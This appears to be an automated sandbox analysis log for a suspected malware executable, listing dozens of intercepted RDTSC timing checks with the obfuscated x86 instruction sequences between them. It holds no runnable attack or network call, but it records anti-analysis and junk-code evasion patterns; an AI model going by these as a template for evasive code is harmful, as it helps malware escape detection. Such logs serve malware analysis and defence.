Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: F24D77 second address: F24D9B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F4BA0D39716h 0x0000000d jng 00007F4BA0D39706h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: F24EC3 second address: F24EFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jmp 00007F4BA0D3F166h 0x0000000f pop eax 0x00000010 jc 00007F4BA0D3F15Eh 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 je 00007F4BA0D3F156h 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 jp 00007F4BA0D3F156h 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: F24EFE second address: F24F15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 popad 0x00000009 jne 00007F4BA0D3970Eh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: F2519E second address: F251A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: F251A2 second address: F251C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D39716h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d je 00007F4BA0D39706h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: F26B57 second address: F26B5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: F26B5D second address: F26B6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4BA0D3970Bh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: F28388 second address: F2838E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: F2823A second address: F28240 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: F2ABD3 second address: F2ABD8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: F2C4BD second address: F2C4F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D39716h 0x00000007 jmp 00007F4BA0D39717h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 jne 00007F4BA0D39706h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: E50EC5 second address: E50EC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 53702BC second address: 53702D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D39711h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 53702D1 second address: 53702EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D3F161h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 53702EF second address: 53702F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 53702F5 second address: 5370338 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F4BA0D3F167h 0x00000009 sbb cl, 0000000Eh 0x0000000c jmp 00007F4BA0D3F169h 0x00000011 popfd 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 mov ebp, esp 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a mov bx, si 0x0000001d rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 5370338 second address: 5370374 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 66419DA5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007F4BA0D39712h 0x0000000f add ch, FFFFFFB8h 0x00000012 jmp 00007F4BA0D3970Bh 0x00000017 popfd 0x00000018 popad 0x00000019 mov edx, dword ptr [ebp+0Ch] 0x0000001c pushad 0x0000001d pushad 0x0000001e mov dh, cl 0x00000020 push edi 0x00000021 pop eax 0x00000022 popad 0x00000023 pushad 0x00000024 mov ax, dx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 53906A1 second address: 53906B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D3F15Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 53906B0 second address: 53906DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D39719h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a pushad 0x0000000b mov bl, cl 0x0000000d mov di, 59FCh 0x00000011 popad 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 53906DC second address: 5390706 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F4BA0D3F15Dh 0x0000000a and si, A556h 0x0000000f jmp 00007F4BA0D3F161h 0x00000014 popfd 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 5390706 second address: 539076D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4BA0D39717h 0x00000008 push ecx 0x00000009 pop ebx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ecx 0x0000000e jmp 00007F4BA0D39712h 0x00000013 xchg eax, esi 0x00000014 jmp 00007F4BA0D39710h 0x00000019 push eax 0x0000001a jmp 00007F4BA0D3970Bh 0x0000001f xchg eax, esi 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F4BA0D39715h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 539076D second address: 53907CC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D3F161h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-04h] 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F4BA0D3F15Ch 0x00000013 add si, D5C8h 0x00000018 jmp 00007F4BA0D3F15Bh 0x0000001d popfd 0x0000001e mov di, si 0x00000021 popad 0x00000022 nop 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 pushfd 0x00000027 jmp 00007F4BA0D3F15Eh 0x0000002c sub cx, D828h 0x00000031 jmp 00007F4BA0D3F15Bh 0x00000036 popfd 0x00000037 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 53907CC second address: 5390814 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D39718h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007F4BA0D39712h 0x0000000f sbb cx, A5B8h 0x00000014 jmp 00007F4BA0D3970Bh 0x00000019 popfd 0x0000001a popad 0x0000001b push eax 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 5390814 second address: 5390826 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D3F15Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 5390826 second address: 5390849 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D3970Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d call 00007F4BA0D3970Bh 0x00000012 pop eax 0x00000013 movsx ebx, ax 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 5390849 second address: 539085B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4BA0D3F15Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 53908BC second address: 53908C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 53908C0 second address: 53908D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D3F165h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 53908D9 second address: 53908DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 53908DF second address: 53908E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 539097D second address: 5390987 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov edi, 44FADD78h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 5390987 second address: 538002B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D3F15Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 leave 0x0000000a pushad 0x0000000b mov ax, 42FDh 0x0000000f pushfd 0x00000010 jmp 00007F4BA0D3F15Ah 0x00000015 or ch, FFFFFFD8h 0x00000018 jmp 00007F4BA0D3F15Bh 0x0000001d popfd 0x0000001e popad 0x0000001f retn 0004h 0x00000022 nop 0x00000023 cmp eax, 00000000h 0x00000026 setne al 0x00000029 jmp 00007F4BA0D3F152h 0x0000002b xor ebx, ebx 0x0000002d test al, 01h 0x0000002f jne 00007F4BA0D3F157h 0x00000031 sub esp, 04h 0x00000034 mov dword ptr [esp], 0000000Dh 0x0000003b call 00007F4BA543C74Bh 0x00000040 mov edi, edi 0x00000042 jmp 00007F4BA0D3F15Dh 0x00000047 xchg eax, ebp 0x00000048 push eax 0x00000049 push edx 0x0000004a pushad 0x0000004b call 00007F4BA0D3F163h 0x00000050 pop ecx 0x00000051 movsx edi, ax 0x00000054 popad 0x00000055 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 538002B second address: 538007B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 movsx edx, ax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d mov dx, DA3Ah 0x00000011 mov edi, 5DC06006h 0x00000016 popad 0x00000017 xchg eax, ebp 0x00000018 pushad 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007F4BA0D39719h 0x00000020 and cl, 00000066h 0x00000023 jmp 00007F4BA0D39711h 0x00000028 popfd 0x00000029 push esi 0x0000002a pop edi 0x0000002b popad 0x0000002c push eax 0x0000002d push edx 0x0000002e mov ebx, esi 0x00000030 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 538007B second address: 53800BF instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F4BA0D3F166h 0x00000008 sbb eax, 60E36C38h 0x0000000e jmp 00007F4BA0D3F15Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 mov ebp, esp 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F4BA0D3F160h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 53800BF second address: 53800C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 53800C5 second address: 53800CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 53800CB second address: 5380125 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 sub esp, 2Ch 0x0000000b pushad 0x0000000c movzx esi, bx 0x0000000f movsx ebx, cx 0x00000012 popad 0x00000013 xchg eax, ebx 0x00000014 pushad 0x00000015 mov edi, eax 0x00000017 jmp 00007F4BA0D39710h 0x0000001c popad 0x0000001d push eax 0x0000001e pushad 0x0000001f pushad 0x00000020 call 00007F4BA0D39717h 0x00000025 pop esi 0x00000026 mov dh, D0h 0x00000028 popad 0x00000029 mov ax, 2C21h 0x0000002d popad 0x0000002e xchg eax, ebx 0x0000002f pushad 0x00000030 movzx esi, dx 0x00000033 mov bl, 7Ah 0x00000035 popad 0x00000036 xchg eax, edi 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 5380125 second address: 5380129 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 5380129 second address: 538013C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D3970Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 538013C second address: 5380154 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4BA0D3F164h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 5380154 second address: 5380158 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 53801AE second address: 53801CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D3F169h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 53801CB second address: 53801D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 53801D1 second address: 53801D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 53801D5 second address: 5380205 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D39713h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b sub edi, edi 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov ecx, 4A08ED47h 0x00000015 jmp 00007F4BA0D3970Ch 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 5380205 second address: 5380252 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D3F15Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 inc ebx 0x0000000a pushad 0x0000000b movzx ecx, di 0x0000000e pushad 0x0000000f movsx edi, cx 0x00000012 jmp 00007F4BA0D3F168h 0x00000017 popad 0x00000018 popad 0x00000019 test al, al 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F4BA0D3F167h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 5380252 second address: 5380258 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 5380258 second address: 538025C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 538025C second address: 5380276 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F4BA0D398AAh 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F4BA0D3970Ah 0x00000015 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 5380276 second address: 53802A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D3F15Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea ecx, dword ptr [ebp-14h] 0x0000000c jmp 00007F4BA0D3F166h 0x00000011 mov dword ptr [ebp-14h], edi 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 53802A7 second address: 53802AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 53802AB second address: 53802C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D3F169h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 538039B second address: 53803A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 53803A1 second address: 53803B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4BA0D3F15Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 53803B4 second address: 5380484 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D39719h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b js 00007F4BA0D3973Bh 0x00000011 jmp 00007F4BA0D3970Eh 0x00000016 cmp dword ptr [ebp-14h], edi 0x00000019 pushad 0x0000001a mov ax, 19FDh 0x0000001e movzx eax, bx 0x00000021 popad 0x00000022 jne 00007F4C11A577AEh 0x00000028 jmp 00007F4BA0D39715h 0x0000002d mov ebx, dword ptr [ebp+08h] 0x00000030 pushad 0x00000031 movzx esi, bx 0x00000034 pushfd 0x00000035 jmp 00007F4BA0D39719h 0x0000003a adc cx, 7D26h 0x0000003f jmp 00007F4BA0D39711h 0x00000044 popfd 0x00000045 popad 0x00000046 lea eax, dword ptr [ebp-2Ch] 0x00000049 push eax 0x0000004a push edx 0x0000004b pushad 0x0000004c pushfd 0x0000004d jmp 00007F4BA0D39713h 0x00000052 or cl, 0000005Eh 0x00000055 jmp 00007F4BA0D39719h 0x0000005a popfd 0x0000005b mov eax, 622CF927h 0x00000060 popad 0x00000061 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 5380484 second address: 538048A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 538048A second address: 538048E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 538048E second address: 53804C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D3F15Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c jmp 00007F4BA0D3F166h 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 53804C0 second address: 53804CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4BA0D3970Ah 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 53804CF second address: 53804E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4BA0D3F15Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 53804E1 second address: 53804E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 5370E23 second address: 5370E27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 5370E27 second address: 5370E2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 5370E2D second address: 5370E33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 5370E33 second address: 5370E60 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F4BA0D3970Fh 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F4BA0D39710h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 5370E60 second address: 5370E66 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 5370E66 second address: 5370E6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 5370E6C second address: 5370E70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 5370E70 second address: 5370E97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007F4BA0D39714h 0x0000000f xchg eax, ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov eax, edx 0x00000015 mov bh, 8Fh 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 5370E97 second address: 5370E9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 5370E9D second address: 5370ED2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D3970Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F4BA0D39711h 0x00000011 xchg eax, ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F4BA0D3970Dh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 5370ED2 second address: 5370ED8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 5380A5F second address: 5380A86 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, 249AA07Bh 0x00000008 push esi 0x00000009 pop edx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e pushad 0x0000000f push esi 0x00000010 movsx ebx, cx 0x00000013 pop eax 0x00000014 call 00007F4BA0D39711h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 5380A86 second address: 5380A97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a mov ax, bx 0x0000000d mov ax, dx 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 5380A97 second address: 5380AA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4BA0D3970Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 5380AA8 second address: 5380AAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe	RDTSC instruction interceptor: First address: 5380AAC second address: 5380AB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
